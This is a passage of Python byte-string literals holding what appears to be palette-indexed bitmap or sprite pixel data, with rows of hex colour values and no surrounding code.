b'\xff\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x77\x99\x99\x99\x00\x00\x00\xff\xff\x99\x99'\
b'\x99\x99\x00\x00\x00\xff\xff\xff\xff\x99\x99\xbb\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x77\x99\x99\x99\x00\x00\x00\xff\xff\x99\x99'\
b'\x99\x99\x00\x00\x00\xff\xff\xff\xff\x99\x99\xbb\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x99\x99\x99\x00\x00\x00\xff\xff\x99\x99\x99\x00'\
b'\x00\x00\xff\xff\xff\x99\x99\x99\x99\x99\x99\xbb\xbb\x00\x00\x00'\
b'\x00\x00\x00\x00\x99\x99\x99\x00\x00\x00\xff\xff\x99\x99\x99\x00'\
b'\x00\x00\xff\xff\xff\x99\x99\x99\x99\x99\x99\xbb\xbb\x00\x00\x00'\
b'\x00\x00\x00\x99\x99\x00\x00\x00\xff\xff\x99\x99\x99\x00\x00\x00'\
b'\xff\xff\x99\x99\x99\x99\x99\x00\x00\x00\x00\xbb\xbb\x00\x00\x00'\
b'\x00\x00\x00\x99\x99\x00\x00\x00\xff\xff\x99\x99\x99\x00\x00\x00'\
b'\xff\xff\x99\x99\x99\x99\x99\x00\x00\x00\x00\xbb\xbb\x00\x00\x00'\
b'\x00\x00\x99\x99\x00\x00\x00\xff\x99\x99\x99\x00\x00\x00\xff\xff'\
b'\x99\x99\x99\xbb\xbb\x00\x00\xbb\xbb\xbb\xbb\x00\xbb\x00\x00\x00'\
b'\x00\x00\x99\x99\x00\x00\x00\xff\x99\x99\x99\x00\x00\x00\xff\xff'\
b'\x99\x99\x99\xbb\xbb\x00\x00\xbb\xbb\xbb\xbb\x00\xbb\x00\x00\x00'\
b'\x00\x99\x99\x00\x00\x00\xff\x99\x99\x00\x00\x00\xff\xff\x99\x99'\
b'\x99\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\x00\x00\x00'\
b'\x00\x99\x99\x00\x00\x00\xff\x99\x99\x00\x00\x00\xff\xff\x99\x99'\
b'\x99\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\x00\x00\x00'\
b'\x00\x99\x99\x99\x99\xff\x99\x99\x00\x00\x00\xff\x99\x99\x99\xbb'\
b'\xbb\xbb\xbb\xbb\xbb\x00\x00\x00\x00\x00\x00\x00\xbb\x00\x00\x00'\
b'\x00\x99\x99\x99\x99\xff\x99\x99\x00\x00\x00\xff\x99\x99\x99\xbb'\
b'\xbb\xbb\xbb\xbb\xbb\x00\x00\x00\x00\x00\x00\x00\xbb\x00\x00\x00'\
b'\xbb\x22\x22\x99\x99\x99\x99\x00\x00\x00\xff\x99\x99\xcc\xbb\xbb'\
b'\xbb\xbb\xbb\x00\x00\x77\x77\x77\x77\x77\x77\x77\x00\x00\x00\x00'\
b'\xbb\x22\x22\x99\x99\x99\x99\x00\x00\x00\xff\x99\x99\xcc\xbb\xbb'\
b'\xbb\xbb\xbb\x00\x00\x77\x77\x77\x77\x77\x77\x77\x00\x00\x00\x00'\
b'\xbb\x22\x22\x22\x22\x99\x99\x99\x99\xff\x99\x99\xcc\xbb\xbb\xbb'\
b'\xbb\xbb\x00\x77\x77\x77\x77\x77\x00\x77\x77\x77\x77\x77\x77\x77'\
b'\xbb\x22\x22\x22\x22\x99\x99\x99\x99\xff\x99\x99\xcc\xbb\xbb\xbb'\
b'\xbb\xbb\x00\x77\x77\x77\x77\x77\x00\x77\x77\x77\x77\x77\x77\x77'\
b'\xbb\x22\x99\x99\x22\x22\x22\x99\x99\x99\x99\xcc\xbb\xbb\xbb\xbb'\
b'\xbb\x00\x77\x77\x77\x77\x77\x77\x77\x77\x00\x77\x00\x77\x00\x00'\
b'\xbb\x22\x99\x99\x22\x22\x22\x99\x99\x99\x99\xcc\xbb\xbb\xbb\xbb'\
b'\xbb\x00\x77\x77\x77\x77\x77\x77\x77\x77\x00\x77\x00\x77\x00\x00'\
b'\xbb\x22\x99\xcc\x99\x99\x22\x22\x22\xbb\xbb\xcc\xbb\xbb\xbb\xbb'\
b'\x00\x77\x77\x77\x77\x77\x77\x00\x77\x77\x77\x77\x77\x77\x77\x77'\
b'\xbb\x22\x99\xcc\x99\x99\x22\x22\x22\xbb\xbb\xcc\xbb\xbb\xbb\xbb'\
b'\x00\x77\x77\x77\x77\x77\x77\x00\x77\x77\x77\x77\x77\x77\x77\x77'\
b'\xbb\x22\x99\xcc\xcc\xcc\x99\x99\x22\xbb\x22\xbb\xbb\xbb\xbb\xbb'\
b'\x00\x77\x77\x77\x77\x77\x77\x77\x77\x00\x77\x00\x00\x77\x77\x00'\
b'\xbb\x22\x99\xcc\xcc\xcc\x99\x99\x22\xbb\x22\xbb\xbb\xbb\xbb\xbb'\
b'\x00\x77\x77\x77\x77\x77\x77\x77\x77\x00\x77\x00\x00\x77\x77\x00'\
b'\xbb\x22\x22\x22\x22\xcc\x99\x99\x22\xbb\x22\xbb\xbb\xbb\xbb\x00'\
b'\x77\x77\x77\x77\x77\x77\x00\x77\x77\x77\x77\x77\x77\x00\x00\x00'\
b'\xbb\x22\x22\x22\x22\xcc\x99\x99\x22\xbb\x22\xbb\xbb\xbb\xbb\x00'\
b'\x77\x77\x77\x77\x77\x77\x00\x77\x77\x77\x77\x77\x77\x00\x00\x00'\
b'\xbb\x22\x22\x22\x99\x22\x99\x99\x22\xbb\x22\xbb\xbb\xbb\xbb\x00'\
b'\x77\x77\x00\x77\x00\x77\x77\x77\x77\x77\x00\x22\x22\x00\x00\x00'\
b'\xbb\x22\x22\x22\x99\x22\x99\x99\x22\xbb\x22\xbb\xbb\xbb\xbb\x00'\
b'\x77\x77\x00\x77\x00\x77\x77\x77\x77\x77\x00\x22\x22\x00\x00\x00'\
b'\xbb\x22\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\xbb\x00\xbb\x00'\
b'\x77\x77\x77\x77\x00\x00\x00\x00\x00\x00\x00\x22\xbb\x00\x00\x00'\
b'\xbb\x22\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\xbb\x00\xbb\x00'\
b'\x77\x77\x77\x77\x00\x00\x00\x00\x00\x00\x00\x22\xbb\x00\x00\x00'\
b'\xbb\x22\x22\x22\x99\x22\x22\x22\x22\xbb\x22\x22\xbb\xbb\xbb\xbb'\
b'\x00\x77\x77\x00\xbb\xbb\xbb\xbb\xbb\x22\x22\x22\x22\x00\x00\x00'\
b'\xbb\x22\x22\x22\x99\x22\x22\x22\x22\xbb\x22\x22\xbb\xbb\xbb\xbb'\
b'\x00\x77\x77\x00\xbb\xbb\xbb\xbb\xbb\x22\x22\x22\x22\x00\x00\x00'\
b'\xbb\x22\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\xbb\x00\xbb\xbb'\
b'\xbb\x00\x00\xbb\xbb\xbb\xbb\xbb\x22\x22\x22\x22\xbb\x00\x00\x00'\
b'\xbb\x22\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\xbb\x00\xbb\xbb'\
b'\xbb\x00\x00\xbb\xbb\xbb\xbb\xbb\x22\x22\x22\x22\xbb\x00\x00\x00'\
b'\xbb\x22\x22\x22\x99\x22\x22\x22\x22\xbb\x22\x22\x22\xbb\x00\x00'\
b'\xbb\xbb\xbb\xbb\xbb\xbb\x22\x22\x22\x22\x22\xbb\x00\x00\x00\x00'\
b'\xbb\x22\x22\x22\x99\x22\x22\x22\x22\xbb\x22\x22\x22\xbb\x00\x00'\
b'\xbb\xbb\xbb\xbb\xbb\xbb\x22\x22\x22\x22\x22\xbb\x00\x00\x00\x00'\
b'\xbb\x22\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\x22\x22\xbb\xbb'\
b'\xbb\xbb\xbb\xbb\x22\x22\x22\x22\x22\x22\xbb\x00\x00\x00\x00\x00'\
b'\xbb\x22\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\x22\x22\xbb\xbb'\
b'\xbb\xbb\xbb\xbb\x22\x22\x22\x22\x22\x22\xbb\x00\x00\x00\x00\x00'\
b'\xbb\x22\x22\x22\x99\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\x22'\
b'\x22\x22\x22\x22\x22\x22\x22\x22\xbb\xbb\x00\x00\x00\x00\x00\x00'\
b'\xbb\x22\x22\x22\x99\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\x22'\
b'\x22\x22\x22\x22\x22\x22\x22\x22\xbb\xbb\x00\x00\x00\x00\x00\x00'\
b'\xbb\x22\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\x22'\
b'\x22\x22\x22\x22\x22\x22\xbb\xbb\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\xbb\x22\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\x22'\
b'\x22\x22\x22\x22\x22\x22\xbb\xbb\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\xbb\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\x22'\
b'\x22\x22\x22\x22\xbb\xbb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\xbb\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\x22'\
b'\x22\x22\x22\x22\xbb\xbb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\xbb\x22\x22\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\x22'\
b'\x22\x22\xbb\xbb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\xbb\x22\x22\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\x22'\
b'\x22\x22\xbb\xbb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\xbb\xbb\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\xbb'\
b'\xbb\xbb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\xbb\xbb\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\xbb'\
b'\xbb\xbb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\xbb\xbb\x22\x22\xbb\x22\x22\xbb\xbb\xbb\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\xbb\xbb\x22\x22\xbb\x22\x22\xbb\xbb\xbb\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\xbb\xbb\xbb\xbb\xbb\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\xbb\xbb\xbb\xbb\xbb\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x99\x99\x99\x99\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x99\x99\x99\x99\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x99\x99\x99'\
b'\x99\x99\x99\x99\x99\x99\x99\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x99\x99\x99'\
b'\x99\x99\x99\x99\x99\x99\x99\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x99\x99\x99\x99\x00\x00'\
b'\x00\xff\xff\xff\xff\x99\x99\x99\x99\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x99\x99\x99\x99\x00\x00'\
b'\x00\xff\xff\xff\xff\x99\x99\x99\x99\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x99\x99\x99\x00\x00\x00\xff\xff'\
b'\xff\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x99\x99\x99\x00\x00\x00\xff\xff'\
b'\xff\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x99\x99\x99\x00\x00\x00\xff\xff\x99\x99'\
b'\x99\x99\x00\x00\x00\xff\xff\xff\xff\x99\x99\xbb\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x99\x99\x99\x00\x00\x00\xff\xff\x99\x99'\
b'\x99\x99\x00\x00\x00\xff\xff\xff\xff\x99\x99\xbb\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x99\x99\x99\x00\x00\x00\xff\xff\x99\x99\x99\x00'\
b'\x00\x00\xff\xff\xff\x99\x99\x99\x99\x99\x99\xbb\xbb\x00\x00\x00'\
b'\x00\x00\x00\x00\x99\x99\x99\x00\x00\x00\xff\xff\x99\x99\x99\x00'\
b'\x00\x00\xff\xff\xff\x99\x99\x99\x99\x99\x99\xbb\xbb\x00\x00\x00'\
b'\x00\x00\x00\x99\x99\x00\x00\x00\xff\xff\x99\x99\x99\x00\x00\x00'\
b'\xff\xff\x99\x99\x99\x99\xbb\x00\x00\x00\x00\xbb\xbb\x00\x00\x00'\
b'\x00\x00\x00\x99\x99\x00\x00\x00\xff\xff\x99\x99\x99\x00\x00\x00'\
b'\xff\xff\x99\x99\x99\x99\xbb\x00\x00\x00\x00\xbb\xbb\x00\x00\x00'\
b'\x00\x00\x99\x99\x00\x00\x00\xff\x99\x99\x99\x00\x00\x00\xff\xff'\
b'\x99\x99\x99\xbb\xbb\x00\x00\xbb\xbb\xbb\xbb\x00\xbb\x00\x00\x00'\
b'\x00\x00\x99\x99\x00\x00\x00\xff\x99\x99\x99\x00\x00\x00\xff\xff'\
b'\x99\x99\x99\xbb\xbb\x00\x00\xbb\xbb\xbb\xbb\x00\xbb\x00\x00\x00'\
b'\x00\x99\x99\x00\x00\x00\xff\x99\x99\x00\x00\x00\xff\xff\x99\x99'\
b'\x99\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\x00\x00\x00'\
b'\x00\x99\x99\x00\x00\x00\xff\x99\x99\x00\x00\x00\xff\xff\x99\x99'\
b'\x99\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\x00\x00\x00'\
b'\x00\x99\x99\x99\x99\xff\x99\x99\x00\x00\x00\xff\x99\x99\x99\xbb'\
b'\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\x00\x00\x00'\
b'\x00\x99\x99\x99\x99\xff\x99\x99\x00\x00\x00\xff\x99\x99\x99\xbb'\
b'\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\x00\x00\x00'\
b'\xbb\x22\x22\x99\x99\x99\x99\x00\x00\x00\xff\x99\x99\xcc\xbb\xbb'\
b'\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\x00\x00\x00\x00'\
b'\xbb\x22\x22\x99\x99\x99\x99\x00\x00\x00\xff\x99\x99\xcc\xbb\xbb'\
b'\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\x00\x00\x00\x00'\
b'\xbb\x22\x22\x22\x22\x99\x99\x99\x99\xff\x99\x99\xcc\xbb\xbb\xbb'\
b'\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\x00\xbb\x00\x00\x00'\
b'\xbb\x22\x22\x22\x22\x99\x99\x99\x99\xff\x99\x99\xcc\xbb\xbb\xbb'\
b'\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\x00\xbb\x00\x00\x00'\
b'\xbb\x22\x99\x99\x22\x22\x22\x99\x99\x99\x99\xcc\xbb\xbb\xbb\xbb'\
b'\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\x00\x00\x00\x00\x00'\
b'\xbb\x22\x99\x99\x22\x22\x22\x99\x99\x99\x99\xcc\xbb\xbb\xbb\xbb'\
b'\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\x00\x00\x00\x00\x00'\
b'\xbb\x22\x99\xcc\x99\x99\x22\x22\x22\xbb\xbb\xcc\xbb\xbb\xbb\xbb'\
b'\xbb\x00\x00\xbb\xbb\xbb\xbb\xbb\xbb\x00\x00\x00\xbb\x00\x00\x00'\
b'\xbb\x22\x99\xcc\x99\x99\x22\x22\x22\xbb\xbb\xcc\xbb\xbb\xbb\xbb'\
b'\xbb\x00\x00\xbb\xbb\xbb\xbb\xbb\xbb\x00\x00\x00\xbb\x00\x00\x00'\
b'\xbb\x22\x99\xcc\xcc\xcc\x99\x99\x22\xbb\x22\xbb\xbb\xbb\xbb\xbb'\
b'\x00\x77\x77\x00\x00\x00\x00\x00\x00\x00\x77\x77\x00\x77\x77\x00'\
b'\xbb\x22\x99\xcc\xcc\xcc\x99\x99\x22\xbb\x22\xbb\xbb\xbb\xbb\xbb'\
b'\x00\x77\x77\x00\x00\x00\x00\x00\x00\x00\x77\x77\x00\x77\x77\x00'\
b'\xbb\x22\x22\x22\x22\xcc\x99\x99\x22\xbb\x22\xbb\xbb\xbb\xbb\x00'\
b'\x77\x77\x77\x77\x77\x00\x77\x77\x00\x77\x77\x00\x77\x77\x00\x77'\
b'\xbb\x22\x22\x22\x22\xcc\x99\x99\x22\xbb\x22\xbb\xbb\xbb\xbb\x00'\
b'\x77\x77\x77\x77\x77\x00\x77\x77\x00\x77\x77\x00\x77\x77\x00\x77'\
b'\xbb\x22\x22\x22\x99\x22\x99\x99\x22\xbb\x22\xbb\xbb\xbb\xbb\x00'\
b'\x77\x77\x77\x77\x00\x77\x77\x00\x77\x77\x00\x77\x77\x00\x77\x77'\
b'\xbb\x22\x22\x22\x99\x22\x99\x99\x22\xbb\x22\xbb\xbb\xbb\xbb\x00'\
b'\x77\x77\x77\x77\x00\x77\x77\x00\x77\x77\x00\x77\x77\x00\x77\x77'\
b'\xbb\x22\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\xbb\x00\xbb\x00'\
b'\x77\x77\x77\x77\x77\x77\x00\x77\x77\x00\x77\x77\x00\x77\x77\x00'\
b'\xbb\x22\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\xbb\x00\xbb\x00'\
b'\x77\x77\x77\x77\x77\x77\x00\x77\x77\x00\x77\x77\x00\x77\x77\x00'\
b'\xbb\x22\x22\x22\x99\x22\x22\x22\x22\xbb\x22\x22\xbb\xbb\xbb\xbb'\
b'\x00\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x00\x77\x77\x77\x00'\
b'\xbb\x22\x22\x22\x99\x22\x22\x22\x22\xbb\x22\x22\xbb\xbb\xbb\xbb'\
b'\x00\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x00\x77\x77\x77\x00'\
b'\xbb\x22\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\xbb\x00\xbb\xbb'\
b'\xbb\x00\x77\x77\x77\x77\x77\x00\x77\x77\x77\x77\x77\x77\x00\x00'\
b'\xbb\x22\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\xbb\x00\xbb\xbb'\
b'\xbb\x00\x77\x77\x77\x77\x77\x00\x77\x77\x77\x77\x77\x77\x00\x00'\
b'\xbb\x22\x22\x22\x99\x22\x22\x22\x22\xbb\x22\x22\x22\xbb\x00\x00'\
b'\xbb\xbb\x00\x77\x77\x77\x77\x77\x77\x00\x77\x77\x77\x77\x00\x00'\
b'\xbb\x22\x22\x22\x99\x22\x22\x22\x22\xbb\x22\x22\x22\xbb\x00\x00'\
b'\xbb\xbb\x00\x77\x77\x77\x77\x77\x77\x00\x77\x77\x77\x77\x00\x00'\
b'\xbb\x22\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\x22\x22\xbb\xbb'\
b'\xbb\xbb\xbb\x00\x77\x77\x77\x77\x77\x77\x77\x77\x77\x00\x00\x00'\
b'\xbb\x22\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\x22\x22\xbb\xbb'\
b'\xbb\xbb\xbb\x00\x77\x77\x77\x77\x77\x77\x77\x77\x77\x00\x00\x00'\
b'\xbb\x22\x22\x22\x99\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\x22'\
b'\x22\x22\x22\x22\x00\x77\x77\x77\x77\x77\x77\x77\x00\x00\x00\x00'\
b'\xbb\x22\x22\x22\x99\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\x22'\
b'\x22\x22\x22\x22\x00\x77\x77\x77\x77\x77\x77\x77\x00\x00\x00\x00'\
b'\xbb\x22\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\x22'\
b'\x22\x22\x22\x22\x22\x00\x77\x77\x77\x77\x77\x00\x00\x00\x00\x00'\
b'\xbb\x22\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\x22'\
b'\x22\x22\x22\x22\x22\x00\x77\x77\x77\x77\x77\x00\x00\x00\x00\x00'\
b'\x00\xbb\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\x22'\
b'\x22\x22\x22\x22\xbb\xbb\x00\x00\x77\x77\x00\x00\x00\x00\x00\x00'\
b'\x00\xbb\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\x22'\
b'\x22\x22\x22\x22\xbb\xbb\x00\x00\x77\x77\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\xbb\x22\x22\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\x22'\
b'\x22\x22\xbb\xbb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\xbb\x22\x22\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\x22'\
b'\x22\x22\xbb\xbb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\xbb\xbb\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\xbb'\
b'\xbb\xbb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\xbb\xbb\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\xbb'\
b'\xbb\xbb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\xbb\xbb\x22\x22\xbb\x22\x22\xbb\xbb\xbb\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\xbb\xbb\x22\x22\xbb\x22\x22\xbb\xbb\xbb\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\xbb\xbb\xbb\xbb\xbb\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\xbb\xbb\xbb\xbb\xbb\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x77\x77\x00\x00\x00\x00'\
b'\x99\x99\x99\x99\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x77\x77\x00\x00\x00\x00'\
b'\x99\x99\x99\x99\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x77\x77\x77\x77\x00\x99\x99\x99'\
b'\x99\x99\x99\x99\x99\x99\x99\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x77\x77\x77\x77\x00\x99\x99\x99'\
b'\x99\x99\x99\x99\x99\x99\x99\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x77\x77\x00\x99\x99\x99\x99\x00\x00'\
b'\x00\xff\xff\xff\xff\x99\x99\x99\x99\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x77\x77\x00\x99\x99\x99\x99\x00\x00'\
b'\x00\xff\xff\xff\xff\x99\x99\x99\x99\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x77\x77\x99\x99\x99\x00\x00\x00\xff\xff'\
b'\xff\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x77\x77\x99\x99\x99\x00\x00\x00\xff\xff'\
b'\xff\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x77\x99\x99\x99\x00\x00\x00\xff\xff\x99\x99'\
b'\x99\x99\x00\x00\x00\xff\xff\xff\xff\x99\x99\xbb\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x77\x99\x99\x99\x00\x00\x00\xff\xff\x99\x99'\
b'\x99\x99\x00\x00\x00\xff\xff\xff\xff\x99\x99\xbb\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x99\x99\x99\x00\x00\x00\xff\xff\x99\x99\x99\x00'\
b'\x00\x00\xff\xff\xff\x99\x99\x99\x99\x99\x99\xbb\xbb\x00\x00\x00'\
b'\x00\x00\x00\x00\x99\x99\x99\x00\x00\x00\xff\xff\x99\x99\x99\x00'\
b'\x00\x00\xff\xff\xff\x99\x99\x99\x99\x99\x99\xbb\xbb\x00\x00\x00'\
b'\x00\x00\x00\x99\x99\x00\x00\x00\xff\xff\x99\x99\x99\x00\x00\x00'\
b'\xff\xff\x99\x99\x99\x99\xbb\x00\x00\x00\x00\xbb\xbb\x00\x00\x00'\
b'\x00\x00\x00\x99\x99\x00\x00\x00\xff\xff\x99\x99\x99\x00\x00\x00'\
b'\xff\xff\x99\x99\x99\x99\xbb\x00\x00\x00\x00\xbb\xbb\x00\x00\x00'\
